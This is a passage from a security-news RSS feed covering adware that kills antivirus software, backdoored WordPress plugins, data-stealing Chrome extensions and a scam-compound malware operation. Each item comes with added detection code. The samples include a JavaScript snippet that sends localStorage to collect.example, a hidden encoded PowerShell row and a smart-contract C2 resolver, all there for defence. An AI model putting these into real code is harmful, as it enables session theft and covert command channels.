If you are interested in contributing find out more here: </em><a href="https://www.techradar.com/news/submit-your-story-to-techradar-pro" target="_blank"><em>https://www.techradar.com/pro/perspectives-how-to-submit</em></a></p>
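<p>The “apply DLP policies to prompts” advice above is easy to state and rarely shown. The following is an added example (not from the article’s author or any vendor it names) of a gate that classifies an outbound prompt before it reaches an external model, blocks the categories that must never leave the organisation at all, and redacts the rest so the request can still be sent. The pattern set, the block list and the sample prompts are this example’s assumptions, not a policy from the article.</p>

```python
import re

# Patterns for content that must never reach an external model. The categories
# and regexes are this example's assumptions; a real policy comes from the
# organisation's own data classification scheme.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_block": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
    "bearer_token": re.compile(r"\bBearer\s+[A-Za-z0-9._~+/-]{20,}=*"),
    "email_address": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.-]+\b"),
}
# Whole PEM body, so redaction does not leave the key material behind the header.
PEM_BLOCK = re.compile(
    r"-----BEGIN [A-Z ]*PRIVATE KEY-----.*?-----END [A-Z ]*PRIVATE KEY-----", re.DOTALL)
# 13-19 digit runs with optional space/dash separators; confirmed with Luhn below.
CARD_CANDIDATE = re.compile(r"\b(?:\d[ -]?){13,19}\b")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum, so digit runs that are not card numbers are ignored."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def find_cards(text: str) -> list:
    return [m.group(0) for m in CARD_CANDIDATE.finditer(text)
            if luhn_ok(re.sub(r"[ -]", "", m.group(0)))]


def classify_prompt(text: str) -> dict:
    """Return {category: [matches]} for a prompt about to leave the organisation."""
    findings = {name: pat.findall(text) for name, pat in SECRET_PATTERNS.items()}
    findings["payment_card"] = find_cards(text)
    return {k: v for k, v in findings.items() if v}


def redact(text: str) -> str:
    """Mask every finding so the rest of the prompt can still be sent."""
    out = PEM_BLOCK.sub("[REDACTED:private_key_block]", text)
    for name, pat in SECRET_PATTERNS.items():
        out = pat.sub(f"[REDACTED:{name}]", out)
    for card in find_cards(out):
        out = out.replace(card, "[REDACTED:payment_card]")
    return out


def gate_prompt(text: str, block_on=("private_key_block", "aws_access_key_id")) -> tuple:
    """Policy decision for one outbound prompt:
    ('block', findings)  categories in block_on never leave, not even redacted
    ('redact', text)     lower-risk findings are masked and the prompt goes on
    ('allow', text)      nothing matched"""
    findings = classify_prompt(text)
    if any(k in findings for k in block_on):
        return "block", findings
    if findings:
        return "redact", redact(text)
    return "allow", text
```

<p>The gate sits wherever prompts leave the network (a proxy in front of the model API, or the client plugin itself); the decision and the category names, never the matched values, are what goes to the SIEM, so the log does not become a second copy of the secret.</p>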
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ 'Anyone with $10 could have walked straight through': Report warns this legit-looking software is actually antivirus-killing adware ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/security/anyone-with-usd10-could-have-walked-straight-through-report-warns-this-legit-looking-software-is-actually-antivirus-killing-adware</link>
                                                                            <description>
                            <![CDATA[ Annoying adware turned out to be a piece of malware capable of killing antivirus software. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">diYJWdiQ4uWoZXFqhfPZQn</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/fg7bgy65pWhFo4Qzib58yX-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 16 Apr 2026 15:35:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Security]]></category>
                                                    <category><![CDATA[Pro]]></category>
                                                                                                                    <dc:creator><![CDATA[ Sead Fadilpašić ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/fg7bgy65pWhFo4Qzib58yX-1280-80.jpg">
                                                            <media:credit><![CDATA[Shutterstock]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Phishing, E-Mail, Network Security, Computer Hacker, Cloud Computing Cyber Security 3d Illustration]]></media:description>                                                            <media:text><![CDATA[Phishing, E-Mail, Network Security, Computer Hacker, Cloud Computing Cyber Security 3d Illustration]]></media:text>
                                <media:title type="plain"><![CDATA[Phishing, E-Mail, Network Security, Computer Hacker, Cloud Computing Cyber Security 3d Illustration]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/fg7bgy65pWhFo4Qzib58yX-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
<ul><li><strong>Huntress sinkholes adware signed by Dragon Boss Solutions LLC</strong></li><li><strong>Malware disabled antivirus, left open update domains exploitable for $10</strong></li><li><strong>Tens of thousands of endpoints compromised, including universities, OT networks, governments, and Fortune 500 firms</strong></li></ul><p>Security researchers at Huntress recently <a href="https://www.huntress.com/blog/pups-grow-fangs" target="_blank">stumbled upon</a> a piece of adware that, by all accounts, should have been a boring, run-of-the-mill ad-displaying nuisance. What they found under the surface, however, raised a few eyebrows and warranted deeper investigation. </p><p>In late March 2026, Huntress was alerted to a piece of software signed by a company called Dragon Boss Solutions LLC. The software, allegedly built for “search monetization research” (but in practice just displaying unwanted ads and redirects), came with an update mechanism that disabled <a href="https://www.techradar.com/best/best-antivirus" target="_blank">antivirus programs</a> and prevented them from being started again.</p><p>While analyzing how the <a href="https://www.techradar.com/best/best-malware-removal" target="_blank">malware</a> worked, the researchers discovered that the threat actors had never registered the main update domain or its fallback, which was at the same time a major risk and a huge opportunity to do good.</p><h2 id="severing-the-ties">Severing the ties</h2><p>“More concerning is it turned out to have an open door baked right into its update configuration, one which anyone with $10 could have walked straight through,” Huntress said. In other words, someone could have registered these domains and thus taken control over a vast network of infected computers. 
</p><p>Instead, it was Huntress who bought the domains, effectively sinkholing the connection from all infected hosts.</p><p>“Within hours” they saw “tens of thousands of compromised endpoints reach out looking for instructions that, in the wrong hands, could have been anything.”</p><p>Analyzing incoming IP addresses, Huntress researchers found 324 infected devices in high-value places, including 221 academic institutions, 41 Operational Technology networks in the energy and transport sectors, 35 municipal governments, state agencies, and public utilities, 24 primary and secondary educational institutions, and 3 healthcare organizations. Networks of multiple Fortune 500 companies were compromised as well. </p><p>To stay safe, the researchers recommend system admins look for WMI event subscriptions containing “MbRemoval” or “MbSetup,” scheduled tasks referencing “WMILoad” or “ClockRemoval,” and processes signed by Dragon Boss Solutions LLC.</p>
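<p>The three indicators Huntress lists above map onto artifacts an admin can pull from a host. The following is an added example, not Huntress’s tooling, that parses Task Scheduler XML definitions and tab-separated dumps of WMI subscription and process-signer data for those markers; the two PowerShell snippets inside it are what collects that data on a live Windows host and are skipped elsewhere. The sample task, WMI rows and signer rows at the bottom are constructed.</p>

```python
import glob
import os
import subprocess
import xml.etree.ElementTree as ET

# Indicators from the Huntress guidance quoted above.
WMI_MARKERS = ("MbRemoval", "MbSetup")
TASK_MARKERS = ("WMILoad", "ClockRemoval")
SIGNER_MARKER = "Dragon Boss Solutions LLC"

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
TASK_DIR = os.path.join(os.environ.get("SystemRoot", r"C:\Windows"), "System32", "Tasks")


def hunt_task_xml(xml_text: str) -> list:
    """Markers found in one Task Scheduler definition (the XML files under
    %SystemRoot%\\System32\\Tasks): the task URI, its description and the
    command line(s) under Actions/Exec are checked."""
    root = ET.fromstring(xml_text)
    fields = [root.findtext("t:RegistrationInfo/t:URI", "", TASK_NS),
              root.findtext("t:RegistrationInfo/t:Description", "", TASK_NS)]
    for ex in root.iterfind("t:Actions/t:Exec", TASK_NS):
        fields.append(ex.findtext("t:Command", "", TASK_NS))
        fields.append(ex.findtext("t:Arguments", "", TASK_NS))
    blob = " ".join(fields).lower()
    return sorted(m for m in TASK_MARKERS if m.lower() in blob)


def hunt_wmi_rows(rows: list) -> list:
    """rows: 'class(tab)name(tab)query-or-command' lines, one per instance in
    root\\subscription (see WMI_PS). Returns (class, name, marker) tuples."""
    hits = []
    for row in rows:
        parts = row.split("\t", 2) + ["", ""]
        cls, name, body = parts[0], parts[1], parts[2]
        for m in WMI_MARKERS:
            if m.lower() in f"{name} {body}".lower():
                hits.append((cls, name, m))
    return hits


def hunt_signer_rows(rows: list) -> list:
    """rows: 'pid(tab)path(tab)signer subject' lines (see SIGNER_PS). Returns (pid, path)."""
    return [(int(p[0]), p[1]) for p in (r.split("\t", 2) for r in rows)
            if len(p) == 3 and SIGNER_MARKER.lower() in p[2].lower()]


# Collection on a live Windows host. These PowerShell snippets emit the
# tab-separated rows the two parsers above expect.
WMI_PS = (
    "foreach ($c in '__EventFilter','CommandLineEventConsumer','ActiveScriptEventConsumer') {"
    " Get-CimInstance -Namespace root/subscription -ClassName $c -ErrorAction SilentlyContinue |"
    " ForEach-Object { \"$c`t$($_.Name)`t$($_.Query)$($_.CommandLineTemplate)$($_.ScriptText)\" } }"
)
SIGNER_PS = (
    "Get-Process | Where-Object Path | ForEach-Object {"
    " $s = Get-AuthenticodeSignature -FilePath $_.Path;"
    " \"$($_.Id)`t$($_.Path)`t$($s.SignerCertificate.Subject)\" }"
)


def _powershell(script: str) -> list:
    if os.name != "nt":
        return []
    res = subprocess.run(["powershell", "-NoProfile", "-Command", script],
                         capture_output=True, text=True)
    return [line for line in res.stdout.splitlines() if line.strip()]


def hunt_host() -> dict:
    """Run all three checks against the local Windows host."""
    tasks = {}
    for path in glob.glob(os.path.join(TASK_DIR, "**", "*"), recursive=True):
        if not os.path.isfile(path):
            continue
        try:
            with open(path, encoding="utf-16") as fh:  # task files are UTF-16 with BOM
                hits = hunt_task_xml(fh.read())
        except (OSError, ET.ParseError, UnicodeError):
            continue
        if hits:
            tasks[path] = hits
    return {"tasks": tasks,
            "wmi": hunt_wmi_rows(_powershell(WMI_PS)),
            "signed_processes": hunt_signer_rows(_powershell(SIGNER_PS))}


# Constructed samples so the parsers can be exercised on any platform.
SAMPLE_TASK = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\ClockRemoval</URI></RegistrationInfo>
  <Actions Context="Author">
    <Exec><Command>C:\ProgramData\svc\WMILoad.exe</Command><Arguments>-q</Arguments></Exec>
  </Actions>
</Task>"""
SAMPLE_WMI_ROWS = [
    "__EventFilter\tMbRemovalFilter\tSELECT * FROM __InstanceModificationEvent WITHIN 60",
    "CommandLineEventConsumer\tMbSetupConsumer\tpowershell.exe -w hidden -enc ...",
    "__EventFilter\tSCM Event Log Filter\tselect * from MSFT_SCMEventLogEvent",
]
SAMPLE_SIGNER_ROWS = [
    "4312\tC:\\ProgramData\\svc\\updater.exe\tCN=Dragon Boss Solutions LLC",
    "812\tC:\\Windows\\explorer.exe\tCN=Microsoft Windows, O=Microsoft Corporation",
]
```

<p>The WMI query covers filters and the two consumer classes that can run code; the __FilterToConsumerBinding instances that tie them together are worth dumping too when a hit turns up, so the whole chain can be removed rather than one half of it.</p>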
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ WordPress websites under attack — expert report says dozens of plugins hijacked to target thousands of sites ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/security/wordpress-websites-under-attack-expert-report-says-dozens-of-plugins-hijacked-to-target-thousands-of-sites</link>
                                                                            <description>
                            <![CDATA[ A malicious actor found a struggling WordPress plugin company, bought it, and introduced malware to each product. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">283qMFw7YpBiC7TW6BmWwR</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/xwpEUtGigAH5K4krGZFy5K-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 15 Apr 2026 16:55:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Security]]></category>
                                                    <category><![CDATA[Pro]]></category>
                                                                                                                    <dc:creator><![CDATA[ Sead Fadilpašić ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/xwpEUtGigAH5K4krGZFy5K-1280-80.jpg">
                                                            <media:credit><![CDATA[Pixabay]]></media:credit>
                                                                                                                                                                        <media:description><![CDATA[Image credit: Pixabay]]></media:description>                                                            <media:text><![CDATA[Person editing a WordPress site]]></media:text>
                                <media:title type="plain"><![CDATA[Person editing a WordPress site]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/xwpEUtGigAH5K4krGZFy5K-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
<ul><li><strong>Malicious actor bought 31 WordPress plugins from Essential Plugin</strong></li><li><strong>Updates injected backdoors, granting full site access</strong></li><li><strong>Spam campaigns hidden from owners, C2 resolved via Ethereum smart contract</strong></li></ul><p>A hacker bought more than 30 legitimate <a href="https://www.techradar.com/best/best-wordpress-plugins" target="_blank">WordPress plugins</a> and abused their good standing to infect tens of thousands of websites with backdoors. </p><p>Austin Ginder, founder of Anchor Hosting, reported how a client recently alerted him that a known plugin was suddenly allowing unauthorized third-party access. The investigation led him to a troubling discovery: a company that developed 31 WordPress plugins, in both free and premium versions, was sold in early 2025 to a person calling themselves “Kris”.</p><p>That person then added malicious code to all of the plugins and pushed the update to the WordPress websites actively using them.</p><h2 id="injecting-sophisticated-code">Injecting sophisticated code</h2><p>The company in question is called Essential Plugin, and it claims its products have been installed more than 400,000 times and are actively used by more than 15,000 customers. The official WordPress repository shows more than 20,000 active installations. </p><p>The malware was essentially a backdoor that granted the attacker full access to the websites. The goal seems to have been to propagate existing spam campaigns:</p><p>“The injected code was sophisticated,” Ginder explained. “It fetched spam links, redirects, and fake pages from a command-and-control server. It only showed the spam to Googlebot, making it invisible to site owners. And here is the wildest part. It resolved its C2 domain through an Ethereum smart contract, querying public blockchain RPC endpoints. 
Traditional domain takedowns would not work because the attacker could update the smart contract to point to a new domain at any time.”</p><p>The full list of compromised plugins can be found on <a href="https://anchor.host/someone-bought-30-wordpress-plugins-and-planted-a-backdoor-in-all-of-them/" target="_blank">Ginder's blog</a>. If you are using any of them, replace them with a safer alternative. Ginder also shared a patching method on his blog.</p><p>In the meantime, WordPress has removed all of the malicious plugins from the repository.</p><p><em>Via </em><a href="https://techcrunch.com/2026/04/14/someone-planted-backdoors-in-dozens-of-wordpress-plugins-used-in-thousands-of-websites/" target="_blank"><em>TechCrunch</em></a></p>
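<p>Ginder’s description of C2 resolution through a smart contract is worth seeing at the protocol level, both to understand why a domain takedown does nothing and to know what the traffic looks like from the hosting side. The following is an added example (not the backdoor’s code and not Ginder’s) that builds the eth_call JSON-RPC request a client would send to any public RPC endpoint, encodes and decodes the ABI string return such a contract would hand back, and flags Ethereum reads leaving the web tier in a constructed egress log. The contract address, the function selector and the assumption that the contract returns the domain as a plain string are placeholders; the article does not publish those details.</p>

```python
import json
import re

# Placeholders: the article does not publish the real contract or selector. A
# selector is the first four bytes of the Keccak-256 hash of the function
# signature and is taken from the contract's ABI.
C2_CONTRACT = "0x" + "11" * 20
C2_SELECTOR = "0xdeadbeef"


def build_eth_call(contract: str, selector: str, req_id: int = 1) -> str:
    """JSON-RPC body a client POSTs to a public Ethereum RPC endpoint to read a
    view function on `contract`; no transaction, no wallet, no fee."""
    return json.dumps({"jsonrpc": "2.0", "id": req_id, "method": "eth_call",
                       "params": [{"to": contract, "data": selector}, "latest"]})


def abi_encode_string(s: str) -> str:
    """ABI encoding of a single dynamic `string` return value: a 32-byte offset
    (0x20 when it is the only value), a 32-byte length, then the bytes padded
    up to a multiple of 32."""
    raw = s.encode()
    head = (32).to_bytes(32, "big")
    length = len(raw).to_bytes(32, "big")
    padded = raw + b"\x00" * (-len(raw) % 32)
    return "0x" + (head + length + padded).hex()


def abi_decode_string(hexdata: str) -> str:
    """Inverse of abi_encode_string, with bounds checks on the declared sizes."""
    data = bytes.fromhex(hexdata[2:] if hexdata.startswith("0x") else hexdata)
    if len(data) < 64:
        raise ValueError("too short for a dynamic string return")
    offset = int.from_bytes(data[:32], "big")
    length = int.from_bytes(data[offset:offset + 32], "big")
    start = offset + 32
    if start + length > len(data):
        raise ValueError("declared length runs past the payload")
    return data[start:start + length].decode()


def resolve_c2(rpc_response_body: str) -> str:
    """What the backdoor's resolver does with the RPC reply: pull the current
    domain out of the ABI-encoded `result`. Updating the contract's stored
    string moves every infected site to a new domain without touching them."""
    resp = json.loads(rpc_response_body)
    if "error" in resp:
        raise RuntimeError(resp["error"])
    return abi_decode_string(resp["result"])


# Detection side: a web server has no reason to speak Ethereum JSON-RPC, so any
# eth_* read leaving the web tier is worth an alert whatever the destination.
ETH_RPC_READ = re.compile(r'"method"\s*:\s*"eth_(?:call|getStorageAt|getLogs)"')


def find_rpc_beacons(log_lines: list) -> list:
    """log_lines use a constructed 'ts user method url body' egress-proxy format.
    Returns (ts, user, url) for every line whose body is an Ethereum read."""
    hits = []
    for line in log_lines:
        parts = line.split(" ", 4)
        if len(parts) < 5:
            continue
        ts, user, _method, url, body = parts
        if ETH_RPC_READ.search(body):
            hits.append((ts, user, url))
    return hits


# Constructed sample: one beacon from the PHP worker, two benign requests.
SAMPLE_EGRESS_LOG = [
    "2026-04-10T09:12:01Z www-data POST https://rpc.example/ " + build_eth_call(C2_CONTRACT, C2_SELECTOR),
    "2026-04-10T09:12:05Z www-data GET https://api.wordpress.org/plugins/info/1.2/ -",
    '2026-04-10T09:13:44Z backup POST https://backup.example/put {"op": "put"}',
]
```

<p>The detection keys on the JSON-RPC method rather than on endpoint hostnames, because the whole point of the technique is that the attacker can pick any of the many public RPC providers; an egress allowlist for the web tier makes the alert redundant, which is the better end state.</p>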
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Google Chrome users beware — experts warn over 100 Web Store extensions found stealing user data from thousands of accounts ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/security/google-chrome-users-beware-experts-warn-over-100-web-store-extensions-found-stealing-user-data-from-thousands-of-accounts</link>
                                                                            <description>
                            <![CDATA[ All extensions seem to have been made by a single actor, possibly of Russian origin. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">6G56bTcWooaUgkAHbP4rgm</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/tSejjmrgK46MgdhWqD5miC-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 15 Apr 2026 11:25:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Security]]></category>
                                                    <category><![CDATA[Pro]]></category>
                                                                                                                    <dc:creator><![CDATA[ Sead Fadilpašić ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/tSejjmrgK46MgdhWqD5miC-1280-80.jpg">
                                                            <media:credit><![CDATA[Tada Images / Shutterstock]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Google Chrome app is seen on an iPhone next to Edge and other web browser apps. Microsoft is using new prompts in Edge to try and stop users from downloading Chrome.]]></media:description>                                                            <media:text><![CDATA[Google Chrome app is seen on an iPhone next to Edge and other web browser apps. Microsoft is using new prompts in Edge to try and stop users from downloading Chrome.]]></media:text>
                                <media:title type="plain"><![CDATA[Google Chrome app is seen on an iPhone next to Edge and other web browser apps. Microsoft is using new prompts in Edge to try and stop users from downloading Chrome.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/tSejjmrgK46MgdhWqD5miC-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
<ul><li><strong>Socket finds 108 malicious Chrome extensions stealing tokens and data</strong></li><li><strong>Extensions harvest Google account info, hijack Telegram sessions, and open backdoors</strong></li><li><strong>Likely Russian MaaS operation; 20,000+ installs, still live in Web Store</strong></li></ul><p>A single threat actor has apparently smuggled more than 100 malicious browser extensions into the official Google Chrome Web Store, looking to steal authentication tokens and establish backdoors on people’s devices.</p><p>Analyzing Google’s <a href="https://www.techradar.com/best/browser">browser</a> repository, security researchers at Socket <a href="https://socket.dev/blog/108-chrome-ext-linked-to-data-exfil-session-theft-shared-c2" target="_blank">found</a> 108 extensions split into five distinct categories: Telegram sidebar clients, slot machine and Keno games, YouTube and TikTok enhancers, text translation tools, and browser utilities. </p><p>While on the surface all of them worked as intended, in the background they were doing all sorts of malicious things.</p><h2 id="tiered-system-and-new-announcements">Tiered system and new announcements</h2><p>For example, a cluster of 78 extensions was seen injecting attacker-controlled HTML into the user interface, while 54 extensions were harvesting emails, names, profile pictures, and Google account IDs. </p><p>They also stole Google OAuth2 Bearer tokens. A third group of 45 extensions worked as a backdoor, fetching commands from the C2 infrastructure and opening arbitrary URLs. A few extensions stripped security headers and injected ads into YouTube and TikTok. </p><p>However, the most dangerous extension was seen stealing Telegram Web sessions every 15 seconds, extracting data from local storage along with the session token for Telegram Web. 
</p><p>While the extensions were published from five separate profiles, they all connected back to the same command-and-control infrastructure, which suggests that this is all the work of a single threat actor. Judging by the comments in the code for authentication and session theft, Socket concluded that this was most likely a Russian malware-as-a-service (MaaS) operation. However, it was not able to attribute the campaign to a specific actor or cluster.</p><p><a href="https://cyberinsider.com/108-chrome-extensions-caught-stealing-user-data-and-hijacking-sessions/" target="_blank">Some sources</a> said the extensions had been installed at least 20,000 times and that, despite Socket’s takedown requests, Google had not yet removed the extensions from the repository, so if you are using any of them, it would be best to uninstall them immediately.</p>
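<p>Socket’s findings translate into things a reviewer can check in an extension bundle before it is allowed into a managed browser: what the manifest asks for, and what the code does with it. The following is an added example, not Socket’s scanner, that scores a manifest plus its JavaScript against indicator families mirroring the reported behaviours (OAuth token access, periodic localStorage dumps shipped to a server, fetch-then-open backdoors, header stripping, UI injection). The regexes, weights and threshold are this example’s choices, and the two sample extensions are constructed.</p>

```python
import json
import re

# Indicator families follow what Socket described; the regexes and the weights
# below are this example's choices, not Socket's detection logic.
CODE_INDICATORS = {
    "oauth_token_access": re.compile(r"chrome\.identity\.getAuthToken|\bBearer\b"),
    "session_storage_read": re.compile(
        r"localStorage\.(?:getItem|key)\b|Object\.(?:keys|entries)\(\s*localStorage\s*\)"),
    "polling_loop": re.compile(r"\bsetInterval\s*\("),
    "remote_command_fetch": re.compile(r"\bfetch\s*\(\s*[\"'`]https?://"),
    "arbitrary_url_open": re.compile(r"chrome\.(?:tabs|windows)\.create\s*\("),
    "ui_injection": re.compile(r"\.innerHTML\s*=|insertAdjacentHTML\s*\("),
    "header_stripping": re.compile(
        r"onHeadersReceived|content-security-policy|x-frame-options", re.IGNORECASE),
}
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
RISKY_PERMISSIONS = {"identity", "cookies", "webRequest", "webRequestBlocking",
                     "declarativeNetRequest", "scripting", "tabs"}


def triage_manifest(manifest: dict) -> dict:
    """Broad host access and sensitive API permissions declared in manifest.json
    (MV2 lists host patterns under `permissions`, MV3 under `host_permissions`)."""
    hosts = list(manifest.get("host_permissions", []))
    hosts += [p for p in manifest.get("permissions", []) if "://" in p or p == "<all_urls>"]
    for cs in manifest.get("content_scripts", []):
        hosts += cs.get("matches", [])
    return {"broad_hosts": sorted(set(hosts) & BROAD_HOSTS),
            "risky_permissions": sorted(set(manifest.get("permissions", [])) & RISKY_PERMISSIONS)}


def triage_code(sources: dict) -> dict:
    """sources: {filename: javascript_text}. Returns {indicator: [files]}."""
    findings = {}
    for fname, src in sources.items():
        for ind, pat in CODE_INDICATORS.items():
            if pat.search(src):
                findings.setdefault(ind, []).append(fname)
    return findings


def risk_score(manifest: dict, sources: dict) -> tuple:
    """Numeric score plus the evidence. Combinations that reproduce the reported
    behaviours (periodic session harvesting shipped out, fetch-then-open
    backdoor) weigh more than any single indicator."""
    m, c = triage_manifest(manifest), triage_code(sources)
    score = 2 * len(m["broad_hosts"]) + len(m["risky_permissions"]) + 2 * len(c)
    if all(k in c for k in ("session_storage_read", "polling_loop", "remote_command_fetch")):
        score += 5
    if all(k in c for k in ("remote_command_fetch", "arbitrary_url_open")):
        score += 3
    return score, {"manifest": m, "code": c}


def triage_extension(manifest_json: str, sources: dict, threshold: int = 8) -> dict:
    score, evidence = risk_score(json.loads(manifest_json), sources)
    verdict = "reject" if score >= threshold else ("review" if score else "pass")
    return {"score": score, "verdict": verdict, **evidence}


# Constructed samples: a theme switcher, and a "Telegram sidebar" that mirrors
# the reported behaviour (dump localStorage every 15 s and POST it to a server).
BENIGN_MANIFEST = ('{"manifest_version": 3, "name": "Dark Theme", "permissions": ["storage"],'
                   ' "content_scripts": [{"matches": ["https://example.com/*"], "js": ["cs.js"]}]}')
BENIGN_JS = 'chrome.storage.local.get("theme", t => document.body.classList.add(t.theme || "dark"));'
SUSPECT_MANIFEST = ('{"manifest_version": 3, "name": "Telegram Sidebar",'
                    ' "permissions": ["identity", "tabs", "scripting"], "host_permissions": ["<all_urls>"],'
                    ' "background": {"service_worker": "bg.js"}}')
SUSPECT_JS = """
setInterval(async () => {
  const dump = {};
  for (const k of Object.keys(localStorage)) dump[k] = localStorage.getItem(k);
  await fetch("https://collect.example/s", {method: "POST", body: JSON.stringify(dump)});
}, 15000);
"""
```

<p>Scores are a queueing aid, not a verdict on their own: minified or obfuscated bundles defeat the regexes, so anything that scores zero while asking for broad hosts and identity still deserves a manual look, and an extension allowlist enforced through browser policy is what actually keeps the 20,000 installs from happening in a managed fleet.</p>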
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ 'Industrial-scale scam operations': Global criminal organization operated slave compounds in Asia behind huge malware-as-a-service hydra targeting 35+ government agencies monthly ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/security/industrial-scale-scam-operations-global-criminal-organization-operated-slave-compounds-in-asia-behind-huge-malware-as-a-service-hydra-targeting-35-government-agencies-monthly</link>
                                                                            <description>
                            <![CDATA[ Shocking report claims forced labor used to distribute malware in Cambodian compounds. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">TobMG2WkdAB9mhiNdCGUrk</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/VGPtSi99Vy7pCWeNLEcT5c-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Mon, 13 Apr 2026 17:25:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Security]]></category>
                                                    <category><![CDATA[Pro]]></category>
                                                                                                                    <dc:creator><![CDATA[ Sead Fadilpašić ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/VGPtSi99Vy7pCWeNLEcT5c-1280-80.jpg">
                                                            <media:credit><![CDATA[Shutterstock]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[hacker hands at work with  interface around]]></media:description>                                                            <media:text><![CDATA[hacker hands at work with  interface around]]></media:text>
                                <media:title type="plain"><![CDATA[hacker hands at work with  interface around]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/VGPtSi99Vy7pCWeNLEcT5c-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
<ul><li><strong>Infoblox & Chong Lua Dao uncover global MaaS platform</strong></li><li><strong>Spoofed domains harvest KYC data, intercept SMS, drain bank accounts</strong></li><li><strong>Captive workers trafficked into Cambodian scam compound tied to elites</strong></li></ul><p>Malware operators - the people sending phishing emails and guiding victims through the infection chain - don’t always do it of their own free will; sometimes they are trafficked into scam centers and forced to work there.</p><p>One such global criminal organization was uncovered by security researchers at Infoblox Threat Intel and the Vietnamese non-profit Chong Lua Dao, who recently observed a spike in anomalous DNS traffic across Infoblox customer networks, which led them to a previously undocumented <a href="https://www.techradar.com/best/best-malware-removal" target="_blank">malware-as-a-service</a> (M) platform. </p><p>Further investigation uncovered that the platform registers roughly 35 new domains each month and is active in at least 21 countries, including Indonesia, Thailand, Spain, and Turkey.</p><h2 id="political-and-military-ties">Political and military ties</h2><p>The domains spoof legitimate government and banking websites. Victims who download the fake software are required to go through a Know Your Customer (KYC) process, during which the attackers harvest personal data, biometrics, and more. </p><p>Once installed, the malware grants the attackers control over the device, including intercepting SMS messages carrying one-time passcodes and using the victim's actual banking apps to wire money out. 
</p><p>At the same time, several captive workers contacted Chong Lua Dao, requesting rescue from K99 Triumph City - a compound in Sihanoukville, Cambodia, that was previously flagged by the UN for large-scale fraud and forced labor.</p><p>After being rescued, they shared closed-group chat logs, screenshots, and other data that confirmed a service-based malware distribution and scam operation was running on the associated infrastructure, and that several tracked domains were being used in the scam. </p><p>The research also uncovered that a small, tight-knit group of politically connected individuals controls who gets access to the K99 compound. This centralized organization has people at the top with political cover, and the most significant name that surfaced is Senator Kok An. </p><p>Apparently, he's a well-known figure in Sihanoukville's casino and real estate world, and his name has appeared in multiple reports connecting the city's gambling and organized crime infrastructure to political power. </p>
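<p>The spoofed government and banking domains that Infoblox followed through DNS are the kind of thing an organisation’s own resolver log can surface. The following is an added example (not Infoblox’s or Chong Lua Dao’s tooling) that folds homoglyphs and separators out of queried names and compares them with a protected-brand list by exact match, edit distance and brand embedding, run over a constructed resolver log. The brand list, the confusable-character table and the log format are this example’s assumptions.</p>

```python
import re

# Brands the organisation wants watched; constructed for this example.
PROTECTED = {"mybank.example", "taxoffice.example"}
# Visually confusable substitutions commonly used in spoofed names.
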